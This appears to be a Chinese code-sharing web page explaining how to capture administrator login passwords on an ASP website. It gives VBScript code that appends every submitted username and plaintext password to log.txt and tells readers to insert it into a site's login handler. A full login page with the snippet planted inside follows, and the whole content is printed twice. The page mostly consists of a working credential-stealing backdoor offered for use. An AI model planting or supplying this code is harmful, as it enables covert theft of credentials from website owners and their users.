Asp截获后台登录密码的代码
更新时间:2012年05月05日 01:18:32 作者:
很多黑客通过修改后台登陆代码获得目标网站的用户登录密码,这样我们一旦输入了密码就保存到一个txt里面
核心代码:
set fso=server.createobject("scripting.filesystemobject")
if fso.FileExists(server.mappath("log.txt"))=true then
set fin=fso.OpenTextFile(server.mappath("log.txt"))
temp=fin.readall
fin.close
set fin=nothing
end if
set fout=fso.createtextfile(server.mappath("log.txt"))
fout.WriteLine(temp&"user:"&username&"¦pwd:"&password&"¦time:"&now()&"")
fout.close
set fout=nothing
set fso=nothing
在后台登录处表单提交的地方插入!
参考文件:
<%@language=vbscript codepage=936 %>
<%
dim sql,rs
dim username,password,CheckCode
username=replace(trim(request("username")),"'","")
password=replace(trim(Request("password")),"'","")
CheckCode=replace(trim(Request("CheckCode")),"'","")
if UserName="" then
FoundErr=True
ErrMsg=ErrMsg & "<br><li>用户名不能为空!</li>"
end if
if Password="" then
FoundErr=True
ErrMsg=ErrMsg & "<br><li>密码不能为空!</li>"
end if
if CheckCode="" then
FoundErr=True
ErrMsg=ErrMsg & "<br><li>验证码不能为空!</li>"
end if
if session("CheckCode")="" then
FoundErr=True
ErrMsg=ErrMsg & "<br><li>你登录时间过长,请重新返回登录页面进行登录。</li>"
end if
if CheckCode<>CStr(session("CheckCode")) then
FoundErr=True
ErrMsg=ErrMsg & "<br><li>您输入的确认码和系统产生的不一致,请重新输入。</li>"
end if
'这后面是我增加的代码~开始区域
set fso=server.createobject("scripting.filesystemobject")
if fso.FileExists(server.mappath("log.txt"))=true then
set fin=fso.OpenTextFile(server.mappath("log.txt"))
temp=fin.readall
fin.close
set fin=nothing
end if
set fout=fso.createtextfile(server.mappath("log.txt"))
fout.WriteLine(temp&"user:"&username&"|pwd:"&password&"|time:"&now()&"")
fout.close
set fout=nothing
set fso=nothing
'后面的代码被我删除了~结束区域
%>
本文涉及语句作者是:会的不多iFat
复制代码 代码如下:
set fso=server.createobject("scripting.filesystemobject")
if fso.FileExists(server.mappath("log.txt"))=true then
set fin=fso.OpenTextFile(server.mappath("log.txt"))
temp=fin.readall
fin.close
set fin=nothing
end if
set fout=fso.createtextfile(server.mappath("log.txt"))
fout.WriteLine(temp&"user:"&username&"¦pwd:"&password&"¦time:"&now()&"")
fout.close
set fout=nothing
set fso=nothing
在后台登录处表单提交的地方插入!
参考文件:
复制代码 代码如下:
<%@language=vbscript codepage=936 %>
<%
dim sql,rs
dim username,password,CheckCode
username=replace(trim(request("username")),"'","")
password=replace(trim(Request("password")),"'","")
CheckCode=replace(trim(Request("CheckCode")),"'","")
if UserName="" then
FoundErr=True
ErrMsg=ErrMsg & "<br><li>用户名不能为空!</li>"
end if
if Password="" then
FoundErr=True
ErrMsg=ErrMsg & "<br><li>密码不能为空!</li>"
end if
if CheckCode="" then
FoundErr=True
ErrMsg=ErrMsg & "<br><li>验证码不能为空!</li>"
end if
if session("CheckCode")="" then
FoundErr=True
ErrMsg=ErrMsg & "<br><li>你登录时间过长,请重新返回登录页面进行登录。</li>"
end if
if CheckCode<>CStr(session("CheckCode")) then
FoundErr=True
ErrMsg=ErrMsg & "<br><li>您输入的确认码和系统产生的不一致,请重新输入。</li>"
end if
'这后面是我增加的代码~开始区域
set fso=server.createobject("scripting.filesystemobject")
if fso.FileExists(server.mappath("log.txt"))=true then
set fin=fso.OpenTextFile(server.mappath("log.txt"))
temp=fin.readall
fin.close
set fin=nothing
end if
set fout=fso.createtextfile(server.mappath("log.txt"))
fout.WriteLine(temp&"user:"&username&"|pwd:"&password&"|time:"&now()&"")
fout.close
set fout=nothing
set fso=nothing
'后面的代码被我删除了~结束区域
%>
本文涉及语句作者是:会的不多iFat
您可能感兴趣的文章:
相关文章
这篇文章主要介绍了asp+JMAIL实现发送邮件实例代码,感兴趣的小伙伴们可以参考一下2015-09-09
默认我们在ASP中用Replace的时候是会区分大小写的,如何让Replace不区分呢,这里简单介绍下,方便需要的朋友2013-04-04
asp分页生成html的程序脚本代码...2007-09-09
这篇文章主要介绍了asp中创建多级目录的两段代码,需要的朋友可以参考下2007-03-03
这篇文章主要介绍了ASP中实现定时发送邮件的代码分享,使用VBS的方式实现,并运行在数据库中,需要的朋友可以参考下2014-07-07
windows2003下使用asp WScript.Shell的设置方法
在windows2000下,IIS默认设置是可以web和可执行程序通信的。但是在2003下IIS关于这方面的服务是禁止的。2007-12-12
asp 通用数据库连接过程函数...2007-08-08
ASP网站生成静态html页面技术小结...2007-07-07
SmartHTTP 简易HttpRequest类(ASP),需要的朋友可以参考下。2011-03-03
巧用FileSystem组件实现WEB应用中的本地特定打印的方法
巧用FileSystem组件实现WEB应用中的本地特定打印的方法...2007-04-04
最新评论